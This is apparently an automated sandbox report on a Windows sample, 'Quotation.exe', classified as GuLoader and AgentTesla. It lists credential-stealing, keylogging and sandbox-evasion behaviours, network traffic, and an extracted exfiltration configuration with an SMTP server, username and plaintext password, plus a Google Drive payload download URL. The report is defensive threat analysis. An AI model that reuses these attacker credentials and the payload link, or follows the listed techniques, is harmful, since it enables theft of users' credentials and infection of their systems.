Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:Quotation.exe
Analysis ID:1553547
MD5:5bdcc2d33ca974c1d8448afcf83f74d1
SHA1:f693dea01991d995173a5934d478ad43c50e28e2
SHA256:4ad4bb99aa68ac6d5828c71c3f3d5d2983ead0626fd77aba7bb98de727a4b90b
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Quotation.exe (PID: 7016 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 5BDCC2D33CA974C1D8448AFCF83F74D1)
    • Quotation.exe (PID: 4068 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 5BDCC2D33CA974C1D8448AFCF83F74D1)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2334492638.000000000A0C3000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Quotation.exe PID: 4068JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 67.23.226.139, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 4068, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49929
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-11T11:48:51.460958+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949705TCP
            2024-11-11T11:49:29.254638+010020229301A Network Trojan was detected20.109.210.53443192.168.2.949712TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-11T11:50:07.152121+010028032702Potentially Bad Traffic192.168.2.949868142.250.186.78443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Quotation.exe.4068.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}
            Source: Quotation.exeReversingLabs: Detection: 65%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49868 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.9:49877 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49908 version: TLS 1.2
            Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004066F7
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004065AD FindFirstFileW,FindClose,0_2_004065AD
            Source: global trafficTCP traffic: 192.168.2.9:49929 -> 67.23.226.139:587
            Source: Joe Sandbox ViewIP Address: 67.23.226.139 67.23.226.139
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewASN Name: DIMENOCUS DIMENOCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49712
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.9:49705
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49868 -> 142.250.186.78:443
            Source: global trafficTCP traffic: 192.168.2.9:49929 -> 67.23.226.139:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: mail.showpiece.trillennium.biz
            Source: Quotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.showpiece.trillennium.biz
            Source: Quotation.exe, 00000000.00000000.1529758782.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000006.00000000.2328570673.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error...
            Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802098526.000000003A38B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Quotation.exe, 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://showpiece.trillennium.biz
            Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Quotation.exe, 00000006.00000003.2574356823.000000003A3AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.len
            Source: Quotation.exe, 00000006.00000002.2801542235.00000000383E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2802185922.000000003A410000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: Quotation.exe, 00000006.00000002.2801542235.0000000038361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/;
            Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/C
            Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f
            Source: Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download
            Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=download0
            Source: Quotation.exe, 00000006.00000003.2506545881.0000000007C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=12KsKP3cUJWIw646reUMrav_hTvJBAo5f&export=downloadn
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Quotation.exe, 00000006.00000003.2470117513.0000000007C8A000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000006.00000003.2470051036.0000000007C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
            Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.2.9:49868 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.1:443 -> 192.168.2.9:49877 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.9:49908 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Source: C:\Users\user\Desktop\Quotation.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Quotation.exe
            Source: C:\Users\user\Desktop\Quotation.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_6FF823510_2_6FF82351
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_0015A5006_2_0015A500
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_0015A9506_2_0015A950
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_0015D9906_2_0015D990
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_00154A986_2_00154A98
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_00153E806_2_00153E80
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_001541C86_2_001541C8
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB4B2BA6_2_3AB4B2BA
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB466986_2_3AB46698
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB47E206_2_3AB47E20
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB4C2206_2_3AB4C220
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB456486_2_3AB45648
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB431086_2_3AB43108
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB423386_2_3AB42338
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB477406_2_3AB47740
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB4E4406_2_3AB4E440
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB400406_2_3AB40040
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB45D836_2_3AB45D83
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3B6719856_2_3B671985
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3B6719886_2_3B671988
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3B7D4B386_2_3B7D4B38
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3B7D00406_2_3B7D0040
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB400376_2_3AB40037
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 6_2_3AB400066_2_3AB40006
            Source: Quotation.exeStatic PE information: invalid certificate
            Source: Quotation.exe, 00000006.00000002.2780628654.0000000007C72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quotation.exe
            Source: Quotation.exe, 00000006.00000002.2801204973.0000000037FA9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe
            Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@4/4
            Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,0_2_004036DA
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\overlaysJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsdEDDF.tmpJump to behavior
            Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Quotation.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
            Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeFile written: C:\Users\user\Music\antithetic.iniJump to behavior
            Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Quotation.exeStatic file information: File size 1196832 > 1048576
